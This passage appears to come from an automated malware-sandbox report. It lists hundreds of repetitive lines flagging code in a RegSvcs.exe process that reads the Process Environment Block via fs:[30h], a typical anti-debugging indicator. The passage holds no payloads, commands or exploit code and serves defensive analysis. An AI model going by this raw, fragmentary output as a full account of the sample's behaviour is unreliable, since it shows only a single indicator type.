          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B20DE mov eax, dword ptr fs:[00000030h] 5_2_014B20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0142A0E3 mov ecx, dword ptr fs:[00000030h] 5_2_0142A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014380E9 mov eax, dword ptr fs:[00000030h] 5_2_014380E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B60E0 mov eax, dword ptr fs:[00000030h] 5_2_014B60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0142C0F0 mov eax, dword ptr fs:[00000030h] 5_2_0142C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014720F0 mov ecx, dword ptr fs:[00000030h] 5_2_014720F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0143208A mov eax, dword ptr fs:[00000030h] 5_2_0143208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014280A0 mov eax, dword ptr fs:[00000030h] 5_2_014280A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014C80A8 mov eax, dword ptr fs:[00000030h] 5_2_014C80A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014F60B8 mov eax, dword ptr fs:[00000030h] 5_2_014F60B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014F60B8 mov ecx, dword ptr fs:[00000030h] 5_2_014F60B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B2349 mov eax, dword ptr fs:[00000030h] 5_2_014B2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B035C mov eax, dword ptr fs:[00000030h] 5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014B035C mov ecx, dword ptr fs:[00000030h] 5_2_014B035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014FA352 mov eax, dword ptr fs:[00000030h] 5_2_014FA352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014D8350 mov ecx, dword ptr fs:[00000030h] 5_2_014D8350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0150634F mov eax, dword ptr fs:[00000030h] 5_2_0150634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_014D437C mov eax, dword ptr fs:[00000030h] 5_2_014D437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0146A30B mov eax, dword ptr fs:[00000030h] 5_2_0146A30B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_0142C310 mov ecx, dword ptr fs:[00000030h] 5_2_0142C310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe - Code function: 5_2_01450310 mov ecx, dword ptr fs:[00000030h] 5_2_01450310
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov eax, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov ecx, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov eax, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01508324 mov eax, dword ptr fs:[00000030h]5_2_01508324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EC3CD mov eax, dword ptr fs:[00000030h]5_2_014EC3CD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A3C0 mov eax, dword ptr fs:[00000030h]5_2_0143A3C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014383C0 mov eax, dword ptr fs:[00000030h]5_2_014383C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B63C0 mov eax, dword ptr fs:[00000030h]5_2_014B63C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov eax, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov eax, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov ecx, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DE3DB mov eax, dword ptr fs:[00000030h]5_2_014DE3DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D43D4 mov eax, dword ptr fs:[00000030h]5_2_014D43D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D43D4 mov eax, dword ptr fs:[00000030h]5_2_014D43D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014403E9 mov eax, dword ptr fs:[00000030h]5_2_014403E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F0 mov eax, dword ptr fs:[00000030h]5_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F0 mov eax, dword ptr fs:[00000030h]5_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F0 mov eax, dword ptr fs:[00000030h]5_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014663FF mov eax, dword ptr fs:[00000030h]5_2_014663FF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E388 mov eax, dword ptr fs:[00000030h]5_2_0142E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E388 mov eax, dword ptr fs:[00000030h]5_2_0142E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E388 mov eax, dword ptr fs:[00000030h]5_2_0142E388
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145438F mov eax, dword ptr fs:[00000030h]5_2_0145438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145438F mov eax, dword ptr fs:[00000030h]5_2_0145438F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428397 mov eax, dword ptr fs:[00000030h]5_2_01428397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428397 mov eax, dword ptr fs:[00000030h]5_2_01428397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01428397 mov eax, dword ptr fs:[00000030h]5_2_01428397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B8243 mov eax, dword ptr fs:[00000030h]5_2_014B8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B8243 mov ecx, dword ptr fs:[00000030h]5_2_014B8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0150625D mov eax, dword ptr fs:[00000030h]5_2_0150625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142A250 mov eax, dword ptr fs:[00000030h]5_2_0142A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01436259 mov eax, dword ptr fs:[00000030h]5_2_01436259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA250 mov eax, dword ptr fs:[00000030h]5_2_014EA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA250 mov eax, dword ptr fs:[00000030h]5_2_014EA250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434260 mov eax, dword ptr fs:[00000030h]5_2_01434260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434260 mov eax, dword ptr fs:[00000030h]5_2_01434260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01434260 mov eax, dword ptr fs:[00000030h]5_2_01434260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142826B mov eax, dword ptr fs:[00000030h]5_2_0142826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E0274 mov eax, dword ptr fs:[00000030h]5_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142823B mov eax, dword ptr fs:[00000030h]5_2_0142823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0143A2C3 mov eax, dword ptr fs:[00000030h]5_2_0143A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015062D6 mov eax, dword ptr fs:[00000030h]5_2_015062D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402E1 mov eax, dword ptr fs:[00000030h]5_2_014402E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402E1 mov eax, dword ptr fs:[00000030h]5_2_014402E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402E1 mov eax, dword ptr fs:[00000030h]5_2_014402E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E284 mov eax, dword ptr fs:[00000030h]5_2_0146E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E284 mov eax, dword ptr fs:[00000030h]5_2_0146E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B0283 mov eax, dword ptr fs:[00000030h]5_2_014B0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B0283 mov eax, dword ptr fs:[00000030h]5_2_014B0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B0283 mov eax, dword ptr fs:[00000030h]5_2_014B0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402A0 mov eax, dword ptr fs:[00000030h]5_2_014402A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014402A0 mov eax, dword ptr fs:[00000030h]5_2_014402A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov ecx, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C62A0 mov eax, dword ptr fs:[00000030h]5_2_014C62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438550 mov eax, dword ptr fs:[00000030h]5_2_01438550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01438550 mov eax, dword ptr fs:[00000030h]5_2_01438550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146656A mov eax, dword ptr fs:[00000030h]5_2_0146656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146656A mov eax, dword ptr fs:[00000030h]5_2_0146656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146656A mov eax, dword ptr fs:[00000030h]5_2_0146656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C6500 mov eax, dword ptr fs:[00000030h]5_2_014C6500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01504500 mov eax, dword ptr fs:[00000030h]5_2_01504500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01440535 mov eax, dword ptr fs:[00000030h]5_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E53E mov eax, dword ptr fs:[00000030h]5_2_0145E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E5CF mov eax, dword ptr fs:[00000030h]5_2_0146E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E5CF mov eax, dword ptr fs:[00000030h]5_2_0146E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014365D0 mov eax, dword ptr fs:[00000030h]5_2_014365D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A5D0 mov eax, dword ptr fs:[00000030h]5_2_0146A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146A5D0 mov eax, dword ptr fs:[00000030h]5_2_0146A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145E5E7 mov eax, dword ptr fs:[00000030h]5_2_0145E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014325E0 mov eax, dword ptr fs:[00000030h]5_2_014325E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C5ED mov eax, dword ptr fs:[00000030h]5_2_0146C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146C5ED mov eax, dword ptr fs:[00000030h]5_2_0146C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01432582 mov eax, dword ptr fs:[00000030h]5_2_01432582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01432582 mov ecx, dword ptr fs:[00000030h]5_2_01432582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01464588 mov eax, dword ptr fs:[00000030h]5_2_01464588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E59C mov eax, dword ptr fs:[00000030h]5_2_0146E59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B05A7 mov eax, dword ptr fs:[00000030h]5_2_014B05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B05A7 mov eax, dword ptr fs:[00000030h]5_2_014B05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014B05A7 mov eax, dword ptr fs:[00000030h]5_2_014B05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014545B1 mov eax, dword ptr fs:[00000030h]5_2_014545B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014545B1 mov eax, dword ptr fs:[00000030h]5_2_014545B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0146E443 mov eax, dword ptr fs:[00000030h]5_2_0146E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014EA456 mov eax, dword ptr fs:[00000030h]5_2_014EA456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142645D mov eax, dword ptr fs:[00000030h]5_2_0142645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145245A mov eax, dword ptr fs:[00000030h]5_2_0145245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014BC460 mov ecx, dword ptr fs:[00000030h]5_2_014BC460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145A470 mov eax, dword ptr fs:[00000030h]5_2_0145A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145A470 mov eax, dword ptr fs:[00000030h]5_2_0145A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0145A470 mov eax, dword ptr fs:[00000030h]5_2_0145A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01468402 mov eax, dword ptr fs:[00000030h]5_2_01468402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01468402 mov eax, dword ptr fs:[00000030h]5_2_01468402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_01468402 mov eax, dword ptr fs:[00000030h]5_2_01468402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E420 mov eax, dword ptr fs:[00000030h]5_2_0142E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0142E420 mov eax, dword ptr fs:[00000030h]5_2_0142E420
